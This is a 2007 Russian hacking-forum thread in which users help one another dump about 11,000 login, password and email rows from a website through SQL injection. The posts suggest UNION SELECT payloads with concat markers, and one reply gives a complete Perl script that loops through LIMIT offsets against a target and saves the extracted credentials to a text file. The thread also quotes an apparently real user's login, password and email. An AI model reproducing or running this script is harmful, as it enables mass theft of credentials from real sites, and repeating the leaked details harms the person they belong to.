Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Скрипт для Скуль :) (https://forum.antichat.xyz/showthread.php?t=51166)

Xszz 14.10.2007 13:46
Скрипт для Скуль :)
 
Привет

Воозник вопрос :
Вывожу поля login,password,email
но отображает оно мне в одной строке одно поле , допустим
User007:sucks:user007@mail.ru
Пиходится играться с LIMIT постоянно , а там 11000 полей .
Так вот , можно ли написать какой-то скрипт на перле или на чем-то ещё , вытягивало строку User007:sucks:user007@mail.ru и соханялов ТХТ ?
Если да , был бы рад лицезреть сей релиз .
Спасибо с ув. Xszz

Dr.Z3r0 14.10.2007 13:51
http://forum.antichat.ru/thread43966.html
в конце статьи там скрипт на php называецо както типа для вывода через Limit... найдешь ;)
Только запись не в файл а вывод на экран, ну там не сложно подправить ...

lsass.exe 14.10.2007 13:56
вабще для каждого сайт нужно писать свой парсер, а так прото в цикле делаешь запросы, перебирая limit 0,1 до limit 11000,1 к примеру,и при каждом запросе парсишь страницу вытаскивая нужные тебе данные и сохраняешь в текстовик. Если скинешь сюда пример страницы поможем с парсингом ;)

Xszz 14.10.2007 13:57
span style="font-size:14px;color:#ff6600;font-weight:bold;margin-top:-2px;">2 слова обо мне: </span> <span style="font-size:12px;font-weight:bold">Andry:9080319::malkin@mail.nnov.ru</span><br><br>
Сообщение тому, кого ищу:<br>

Вот фрагмент

lsass.exe 14.10.2007 13:59
тут два пути, через регулярки либо, если положение данной строки не меняется, то читаешь всю страницу в массив, потом выбираешь нужную строку в ней юзаешь str_replace заменяя все ненужное на null

Xszz 14.10.2007 14:06
Это все хорошо , но не силен я на столько в языках .

.Slip 14.10.2007 14:07
Цитата:
Сообщение от lsass.exe
вабще для каждого сайт нужно писать свой парсер, а так прото в цикле делаешь запросы, перебирая limit 0,1 до limit 11000,1 к примеру,и при каждом запросе парсишь страницу вытаскивая нужные тебе данные и сохраняешь в текстовик. Если скинешь сюда пример страницы поможем с парсингом ;)
Зачем это надо? А не легче ли в сам запрос вставить:
concat(0x73737373,login,0x3a,password,0x3a,email,0 x73737373)
И отслеживать по 0x73737373 ?

blackybr 14.10.2007 14:08
Код:
#!/usr/bin/perl
use strict;
#use warnings;
use LWP::UserAgent;

#число записей, count(имя поля)
my $num = '90';

my $ua = LWP::UserAgent->new;
$ua->agent("Nintendo X2");
#$ua->proxy(['http', 'ftp'] => 'http://login:pass@proxy-ip:port');
open(FH,">passwd.txt") or die "$!";
for(0..$num) {
  my $req = HTTP::Request->new(GET => "http://site.com/index.php?id=-1+union+select+1,concat(char(64,64),username,pass,char(64,64)+limit+$_,1");
  $req->header('Accept' => 'text/html');
  my $res = $ua->request($req);
  $res->content =~/@@(.+?)@@/;
  print FH $1,"\n";
}
close FH;
не забудь конкатнуть вначале чар 64,64 и в конце
и жди.. на многопоточность влом переписывать

lsass.exe 14.10.2007 14:27
Цитата:
Сообщение от [sL1p]
Зачем это надо? А не легче ли в сам запрос вставить:
concat(0x73737373,login,0x3a,password,0x3a,email,0 x73737373)
И отслеживать по 0x73737373 ?
можно и так )


Время: 01:43